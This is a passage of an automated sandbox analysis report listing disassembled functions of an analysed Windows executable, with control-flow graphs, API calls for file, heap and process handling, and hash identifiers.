                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharCompareMultiStringWide$Info
                                          • String ID:
                                          • API String ID: 1651298574-0
                                          • Opcode ID: 0b065d75f11689d4427d9752874f201de5120d531e926b8b3d271362c7dd42bd
                                          • Instruction ID: 8982f73b66f23a33087e68d4939e0b6a76c79f8fa55c1b86de23fe76a65e9542
                                          • Opcode Fuzzy Hash: 0b065d75f11689d4427d9752874f201de5120d531e926b8b3d271362c7dd42bd
                                          • Instruction Fuzzy Hash: 06719F71A05289AFCF219F94DC859EF7FB6EB05314F14412BF950A2260D3398CA5CB9B
                                          Function 004101D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 134COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 414 4101d0-4101f0 call 412a00 417 4101f2-410204 call 412a00 414->417 418 410206-41020b 414->418 417->418 421 41021f-410226 417->421 420 41020d-41020f 418->420 418->421 420->421 423 410211-410213 420->423 424 410228-41023a call 41338f 421->424 425 41023c-41024a 421->425 423->421 427 410215-41021e 423->427 426 41024f-410251 424->426 425->426 430 410253-410257 426->430 431 410259-410274 GetFullPathNameA 426->431 430->431 432 410285-41029b call 412a00 430->432 433 410276-41027d 431->433 434 41027e 431->434 437 4102a1-4102f6 call 4140c0 GetVolumeInformationA 432->437 438 41037d-410389 432->438 434->432 441 410305-410337 call 41c146 call 412a00 437->441 442 4102f8-410304 437->442 447 410373 441->447 448 410339-41034f call 412a00 441->448 447->438 448->447 451 410351-410371 call 412a00 448->451 451->438 451->447
                                          APIs
                                          • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0041026C
                                          • GetVolumeInformationA.KERNELBASE(C:/,?,00000104,?,?,?,?,00000104), ref: 004102EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FullInformationNamePathVolume
                                          • String ID: C:/$FAT$HPFS$VFAT
                                          • API String ID: 1555998374-1151019397
                                          • Opcode ID: f8df0c4a5d1451d0dd740bb05cf632a3427c018f7f5c4cc689e6d622af555a6f
                                          • Instruction ID: fd030fab3a41d782d0bfb313d5ad92de2eb91019b62ba207a93a103eae62fd2d
                                          • Opcode Fuzzy Hash: f8df0c4a5d1451d0dd740bb05cf632a3427c018f7f5c4cc689e6d622af555a6f
                                          • Instruction Fuzzy Hash: CB4159B16803406AE720DB20EC4BFEB37945F94708F44442AFD9486282F6FCD9D9839E
                                          Function 00418AC8 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 606 418ac8-418ade call 413274 609 418ae0-418ae7 call 414957 606->609 610 418ae8-418af8 606->610 609->610 612 418afe-418b00 610->612 614 418b02-418b1a 612->614 615 418b1c-418b2d GetStartupInfoA 612->615 614->612 616 418b33-418b39 615->616 617 418bf8 615->617 616->617 618 418b3f-418b4e 616->618 619 418bfa-418c06 617->619 620 418b50 618->620 621 418b52-418b58 618->621 622 418c55 619->622 623 418c08-418c0e 619->623 620->621 625 418b5a 621->625 626 418bac-418bb0 621->626 624 418c59-418c5d 622->624 627 418c10-418c13 623->627 628 418c15-418c1c 623->628 624->619 631 418c5f-418c72 SetHandleCount 624->631 632 418b5f-418b6c call 413274 625->632 626->617 630 418bb2-418bb7 626->630 629 418c1f-418c2b GetStdHandle 627->629 628->629 633 418c44-418c48 629->633 634 418c2d-418c36 GetFileType 629->634 635 418bb9-418bbf 630->635 636 418bef-418bf6 630->636 644 418ba6 632->644 645 418b6e-418b77 632->645 633->624 634->633 638 418c38-418c42 634->638 635->636 639 418bc1-418bc4 635->639 636->617 636->630 638->633 641 418c4a-418c4d 638->641 642 418bd1-418bec 639->642 643 418bc6-418bcf GetFileType 639->643 641->624 646 418c4f-418c53 641->646 642->636 643->636 643->642 644->626 647 418b7d-418b7f 645->647 646->624 648 418b81-418b97 647->648 649 418b99-418ba2 647->649 648->647 649->632 650 418ba4 649->650 650->626
                                          APIs
                                          • GetStartupInfoA.KERNEL32(?), ref: 00418B21
                                          • GetFileType.KERNEL32(00000800), ref: 00418BC7
                                          • GetStdHandle.KERNEL32(-000000F6), ref: 00418C20
                                          • GetFileType.KERNELBASE(00000000), ref: 00418C2E
                                          • SetHandleCount.KERNEL32 ref: 00418C65
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FileHandleType$CountInfoStartup
                                          • String ID:
                                          • API String ID: 1710529072-0
                                          • Opcode ID: 894f89217b4e5f8dd3dc04c4c5fc2c2138c20e103943fbb2b5c6704336baf594
                                          • Instruction ID: 9f710145433f53a11f67beba66e492aa2ca87e5ae07b95c08d009534c858da6a
                                          • Opcode Fuzzy Hash: 894f89217b4e5f8dd3dc04c4c5fc2c2138c20e103943fbb2b5c6704336baf594
                                          • Instruction Fuzzy Hash: 7F5115B16082518BD7208F28CC447D67BA0AB12325F19866EF4A6CB3E1DB78E8C5C75D
                                          Function 00413847 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 664 413847-413851 665 413853-41385e GetCurrentProcess TerminateProcess 664->665 666 413864-41387a 664->666 665->666 667 4138b8-4138cc call 4138e0 666->667 668 41387c-413883 666->668 677 4138de-4138df 667->677 678 4138ce-4138d8 ExitProcess 667->678 670 413885-413891 668->670 671 4138a7-4138b7 call 4138e0 668->671 674 413893-413897 670->674 675 4138a6 670->675 671->667 679 413899 674->679 680 41389b-4138a4 674->680 675->671 679->680 680->674 680->675
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00406A5A,error: zipfile read error,00413832,00000000,00000000,00000000,00406A5A,00000003,?,?,?,?,?,?,0040519A), ref: 00413857
                                          • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,0040519A,?,?,?,?,?,?,?,?), ref: 0041385E
                                          • ExitProcess.KERNEL32 ref: 004138D8
                                          Strings
                                          • error: zipfile read error, xrefs: 00413847
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID: error: zipfile read error
                                          • API String ID: 1703294689-3207815817
                                          • Opcode ID: 4a3ba93995f433487ece10c790bf92c59d29a896c2850f85550fccbc002a6eb2
                                          • Instruction ID: 9a9e4aaeeafff871062add6e916ef3ed514e9f96ede6102045d5c26cbba63ca5
                                          • Opcode Fuzzy Hash: 4a3ba93995f433487ece10c790bf92c59d29a896c2850f85550fccbc002a6eb2
                                          • Instruction Fuzzy Hash: AB01C431704310ABD6206F1AFC45A9ABBD5EB84315B50443FF444A22A0DBB959C5DB9E
                                          Function 0040F6D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,020405B8), ref: 0040F6BA
                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,00000000,0000AE00,?,?,000F8000,0040519A), ref: 0040F703
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FilePointerVersion
                                          • String ID: 'h@
                                          • API String ID: 2103187656-431696200
                                          • Opcode ID: c1835f4d64794c132d77b39ac591daec13a6916d697b3494fa6b8190a8c6d3bc
                                          • Instruction ID: 4378285b618a777efcf84251ec6a8b6b99a83c3f06562969f79921aa5accdbfc
                                          • Opcode Fuzzy Hash: c1835f4d64794c132d77b39ac591daec13a6916d697b3494fa6b8190a8c6d3bc
                                          • Instruction Fuzzy Hash: F1F0B43278421076E530A67DBC05FEF23488FD1774F100636F510EA1D0DA38988711AD
                                          Function 0041B7F2 Relevance: 6.2, APIs: 4, Instructions: 230fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 681 41b7f2-41b80d 682 41b818-41b81c 681->682 683 41b80f-41b816 681->683 684 41b823-41b82a 682->684 683->684 685 41b83d-41b846 684->685 686 41b82c-41b82f 684->686 689 41b875 685->689 690 41b848-41b849 685->690 687 41b831-41b837 686->687 688 41b839 686->688 687->685 687->688 688->685 691 41b87c-41b882 689->691 692 41b84b-41b84c 690->692 693 41b86c-41b873 690->693 694 41b884-41b887 691->694 695 41b8aa 691->695 696 41b863-41b86a 692->696 697 41b84e-41b85e 692->697 693->691 699 41b8a1-41b8a8 694->699 700 41b889-41b88c 694->700 701 41b8ad-41b8c0 695->701 696->691 698 41ba88-41ba8b 697->698 704 41baa6-41baaa 698->704 699->701 702 41b898-41b89f 700->702 703 41b88e-41b891 700->703 705 41b8c2 701->705 706 41b8f7-41b8fd 701->706 702->701 703->697 709 41b893-41b896 703->709 710 41b8f2-41b8f5 705->710 711 41b8c4-41b8c6 705->711 707 41b919 706->707 708 41b8ff-41b905 706->708 712 41b920-41b92a 707->712 713 41b910-41b917 708->713 714 41b907-41b909 708->714 709->701 710->712 711->710 715 41b8c8-41b8ca 711->715 717 41b92c-41b93a 712->717 718 41b93f-41b941 712->718 713->712 714->707 716 41b90b 714->716 719 41b8e9-41b8f0 715->719 720 41b8cc-41b8d2 715->720 716->697 717->718 722 41b93c-41b93e 717->722 723 41b943-41b949 718->723 724 41b94d-41b950 718->724 719->712 720->713 721 41b8d4-41b8da 720->721 721->697 727 41b8e0-41b8e7 721->727 722->718 723->724 725 41b952 724->725 726 41b954-41b956 724->726 725->726 728 41b960-41b962 726->728 729 41b958-41b95e 726->729 727->712 730 41b96a-41b976 call 414317 728->730 731 41b964 728->731 729->730 734 41b978-41b989 730->734 735 41b98b-41b9a8 CreateFileA 730->735 731->730 736 41b9c9-41b9cb 734->736 737 41b9aa-41b9b3 GetFileType 735->737 738 41b9bc-41b9c8 GetLastError call 419c07 735->738 736->704 739 41b9d0-41b9d3 737->739 740 41b9b5-41b9b6 CloseHandle 737->740 738->736 742 41b9d5-41b9d9 739->742 743 41b9db-41b9de 739->743 740->738 745 41b9e4-41ba13 call 4143ac 742->745 743->745 746 41b9e0 743->746 749 41ba15-41ba17 745->749 750 41ba8d-41ba91 745->750 746->745 749->750 751 41ba19-41ba1d 749->751 752 41ba93-41ba97 750->752 753 41baa4 750->753 751->750 754 41ba1f-41ba32 call 41908b 751->754 752->753 755 41ba99-41baa0 752->755 753->704 758 41ba42-41ba57 call 41b5e5 754->758 759 41ba34-41ba3e 754->759 755->753 764 41ba59-41ba5d 758->764 765 41ba6f-41ba7f call 41908b 758->765 759->750 760 41ba40 759->760 763 41ba81-41ba87 call 419c6e 760->763 763->698 764->765 767 41ba5f-41ba6d call 41be65 764->767 765->750 765->763 767->763 767->765
                                          APIs
                                          • CreateFileA.KERNELBASE(00000001,80000000,00406700,0000000C,00000001,00000080,00000000,00000000,00000000,00000000), ref: 0041B99E
                                          • GetFileType.KERNELBASE(00000000), ref: 0041B9AB
                                          • CloseHandle.KERNEL32(00000000), ref: 0041B9B6
                                          • GetLastError.KERNEL32 ref: 0041B9BC
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastType
                                          • String ID:
                                          • API String ID: 1809617866-0
                                          • Opcode ID: 9034867e0e5f656806f9e8757dd3215358153a44656e4880629306d682652c13
                                          • Instruction ID: 0ae395d7474f1af9b9c6e449919d5970c2ed78d5f3119fdd6490fe40e80d97b9
                                          • Opcode Fuzzy Hash: 9034867e0e5f656806f9e8757dd3215358153a44656e4880629306d682652c13
                                          • Instruction Fuzzy Hash: B8811271D1420896EF209F68C8847EF7B64EF01768F28421FE951A63D1C7BC89C687CA
                                          Function 0041B5E5 Relevance: 6.2, APIs: 4, Instructions: 174fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 773 41b5e5-41b5f7 774 41b7c2-41b7c9 773->774 775 41b5fd-41b61e 773->775 776 41b7d3 774->776 775->774 777 41b624-41b631 775->777 778 41b7d6-41b7da 776->778 779 41b633-41b636 777->779 780 41b69a-41b69c 777->780 779->780 781 41b638-41b63b 779->781 780->778 782 41b65a-41b671 ReadFile 781->782 783 41b63d-41b642 781->783 784 41b673-41b67e GetLastError 782->784 785 41b6ad-41b6bf 782->785 783->782 786 41b644-41b655 783->786 787 41b680-41b690 784->787 788 41b695-41b698 784->788 789 41b6c5-41b6c7 785->789 790 41b7bd-41b7c0 785->790 786->782 787->776 788->780 791 41b6a1-41b6a8 call 419c07 788->791 792 41b6d2 789->792 793 41b6c9-41b6cc 789->793 790->778 791->776 796 41b6d4-41b6e6 792->796 793->792 795 41b6ce-41b6d0 793->795 795->796 798 41b7b7-41b7ba 796->798 799 41b6ec-41b6f3 796->799 798->790 800 41b7a7-41b7b1 799->800 801 41b6f9-41b6fb 799->801 800->798 804 41b7b3-41b7b5 800->804 802 41b708-41b70c 801->802 803 41b6fd-41b703 801->803 806 41b726-41b742 ReadFile 802->806 807 41b70e-41b715 802->807 805 41b799-41b79f 803->805 804->798 805->799 810 41b7a5 805->810 811 41b744-41b74c GetLastError 806->811 812 41b74e-41b752 806->812 808 41b717-41b71b 807->808 809 41b71d-41b724 807->809 813 41b77b-41b77e 808->813 809->805 810->798 811->812 814 41b795 811->814 812->814 815 41b754-41b75b 812->815 816 41b798 813->816 814->816 817 41b770-41b773 815->817 818 41b75d-41b762 815->818 816->805 820 41b780-41b793 call 41908b 817->820 821 41b775-41b779 817->821 818->813 819 41b764-41b76e 818->819 819->805 820->805 820->814 821->813 821->820
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000100,00000000), ref: 0041B669
                                          • GetLastError.KERNEL32 ref: 0041B673
                                          • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 0041B73A
                                          • GetLastError.KERNEL32 ref: 0041B744
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastRead
                                          • String ID:
                                          • API String ID: 1948546556-0
                                          • Opcode ID: 662fd1020942aae6793e2087e8affa122bfdd206edd3d2d1eb422e75de9f09a4
                                          • Instruction ID: 5320c27688b98f5302928a735e1011bfd1bbdf3e9bbdda589cca2c7182946b54
                                          • Opcode Fuzzy Hash: 662fd1020942aae6793e2087e8affa122bfdd206edd3d2d1eb422e75de9f09a4
                                          • Instruction Fuzzy Hash: 5461D434604385DFDF218F58C884BEA7BB1EF66314F14409BE8618B391D37899C6CB9A
                                          Function 00411DF0 Relevance: 6.2, APIs: 4, Instructions: 171filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 824 411df0-411e0a call 41c29c 827 411e10-411e3a call 40fdc0 CreateFileA 824->827 828 411f48-411f54 GetFileAttributesA 824->828 834 411e40-411e61 GetFileTime CloseHandle 827->834 835 411f3e-411f47 827->835 830 411f94-411f9d 828->830 831 411f56-411f59 828->831 831->830 833 411f5b-411f93 call 407730 831->833 834->835 837 411e67-411e72 834->837 839 411e74-411e82 call 411fa0 837->839 840 411ede-411eec call 412020 837->840 845 411e93-411ea1 call 411fa0 839->845 846 411e84-411e8a 839->846 847 411efd-411f0b call 412020 840->847 848 411eee-411ef4 840->848 854 411ea4-411eaa 845->854 846->845 850 411e8c-411e91 846->850 853 411f0e-411f14 847->853 848->847 849 411ef6-411efb 848->849 849->853 850->854 857 411f16-411f1c 853->857 858 411f2d-411f3b call 412020 853->858 859 411ec3-411edd call 411fa0 854->859 860 411eac-411eb2 854->860 857->858 861 411f1e-411f2c 857->861 858->835 860->859 863 411eb4-411ec2 860->863
                                          APIs
                                          • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000001,?,?,?,004119DD,00000000,00439BA4), ref: 00411E2F
                                          • GetFileTime.KERNEL32(00000000,?,?,?,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411E50
                                          • CloseHandle.KERNEL32(00000000,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411E59
                                            • Part of subcall function 00412020: FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0041202E
                                            • Part of subcall function 00412020: FileTimeToSystemTime.KERNEL32(?,?), ref: 00412050
                                          • GetFileAttributesA.KERNELBASE(?,00000000,00000001,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411F49
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: File$Time$AttributesCloseCreateHandleLocalSystem
                                          • String ID:
                                          • API String ID: 3576422975-0
                                          • Opcode ID: 3cad0420f0cdd6335c139d48f8f330720120e89d336076a35baf0621a384d64a
                                          • Instruction ID: 9a36ea26c0d62d6c96e4ebb2062f951fe69ccc09c33042294df6f6886f757777
                                          • Opcode Fuzzy Hash: 3cad0420f0cdd6335c139d48f8f330720120e89d336076a35baf0621a384d64a
                                          • Instruction Fuzzy Hash: 5751C3316043015BD710DF6AEC81BEBB7E8EB94764F440A2EFE44C3261F369E54A87A5
                                          Function 00415612 Relevance: 6.1, APIs: 4, Instructions: 139fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 867 415612-415627 868 4157a6-4157ad 867->868 869 41562d-415649 867->869 871 4157b7 868->871 869->868 870 41564f-41565a 869->870 872 415663-415665 870->872 873 41565c-41565e 870->873 874 4157ba-4157be 871->874 875 415673-41567b 872->875 876 415667-415670 call 41908b 872->876 873->874 878 415681-41568d 875->878 879 415742-415757 WriteFile 875->879 876->875 883 415693 878->883 884 41577a-415781 878->884 881 415764-41576d GetLastError 879->881 882 415759-415762 879->882 887 41570b-415710 881->887 882->887 888 415699-4156a2 883->888 885 415783-415789 884->885 886 41578f-41579f 884->886 885->873 885->886 886->871 889 4157a1-4157a4 887->889 890 415716-415719 887->890 891 4156a4-4156af 888->891 892 4156cd-4156f2 WriteFile 888->892 889->874 890->884 897 41571b-415721 890->897 893 4156b1-4156b7 891->893 894 4156b8-4156cb 891->894 895 4156f4-4156fc 892->895 896 415737-415740 GetLastError 892->896 893->894 894->888 894->892 898 415709 895->898 899 4156fe-415707 895->899 896->898 900 415723-415732 897->900 901 41576f-415778 call 419c07 897->901 898->887 899->883 899->898 900->871 901->871
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,00000000,?), ref: 004156EA
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: ec952a0408a3cf418a3ec59ac1f76e10f98e980b2df25900257c814851cd74c4
                                          • Instruction ID: fd92a10f5c6077c0babe725d0f2bda95c351a5f2df5236355322924d052ad3e7
                                          • Opcode Fuzzy Hash: ec952a0408a3cf418a3ec59ac1f76e10f98e980b2df25900257c814851cd74c4
                                          • Instruction Fuzzy Hash: 9B51D431A00608EFCB11CF68C985BED7BB0BF95340F6481ABE825CB2D0D7349A81CB58
                                          Function 0041908B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 904 41908b-419098 905 41909a-4190b5 904->905 906 41910d-419114 904->906 905->906 908 4190b7-4190c1 call 41449d 905->908 907 41911e 906->907 909 419121-419124 907->909 912 4190c3-4190cd 908->912 913 4190cf-4190e5 SetFilePointer 908->913 912->907 914 4190e7-4190ed GetLastError 913->914 915 4190ef 913->915 916 4190f1-4190f3 914->916 915->916 917 4190f5-4190fc call 419c07 916->917 918 4190fe-41910b 916->918 917->907 918->909
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,pVA,00000000,00000000,00000000,00000000,?,00415670,00000000,00000000,00000002,00000001,00000000,?), ref: 004190DA
                                          • GetLastError.KERNEL32 ref: 004190E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID: pVA
                                          • API String ID: 2976181284-1183464086
                                          • Opcode ID: 131327f381336626f51c1b1e4d4a234bfad70b39e4a78b2d7dc9e93e7cbb53e2
                                          • Instruction ID: fa06997a6f1e68cb521b0c2e02ae2bf62f6d0eade7be31b879ca3dfd74e60512
                                          • Opcode Fuzzy Hash: 131327f381336626f51c1b1e4d4a234bfad70b39e4a78b2d7dc9e93e7cbb53e2
                                          • Instruction Fuzzy Hash: 0F1104356082026BD710CBB8DCA8B993B94AB05328F64462EF521C72D2DB78DCC5D709
                                          Function 00417635 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004148D6,00000000), ref: 00417646
                                            • Part of subcall function 004174ED: GetVersionExA.KERNEL32 ref: 0041750C
                                          • HeapDestroy.KERNEL32 ref: 00417685
                                            • Part of subcall function 00417692: HeapAlloc.KERNEL32(00000000,00000140,0041766E,000003F8), ref: 0041769F
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Heap$AllocCreateDestroyVersion
                                          • String ID:
                                          • API String ID: 2507506473-0
                                          • Opcode ID: be7ba36ee05323b4acf4cd4af1487bb129e21c23fd765112a91abd45a39af523
                                          • Instruction ID: c639374c03c1bbca960cdedcb2ad31ff4a57a72680c20006ab14361f52bc4f08
                                          • Opcode Fuzzy Hash: be7ba36ee05323b4acf4cd4af1487bb129e21c23fd765112a91abd45a39af523
                                          • Instruction Fuzzy Hash: 4AF09B71A9C701AADF245F795D057E736F197447A5F11843BF940C41A0EF7C84D0991E
                                          Function 00411DA0 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00411DA5
                                          • GetConsoleScreenBufferInfo.KERNELBASE(00000000), ref: 00411DB1
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: BufferConsoleHandleInfoScreen
                                          • String ID:
                                          • API String ID: 3205511803-0
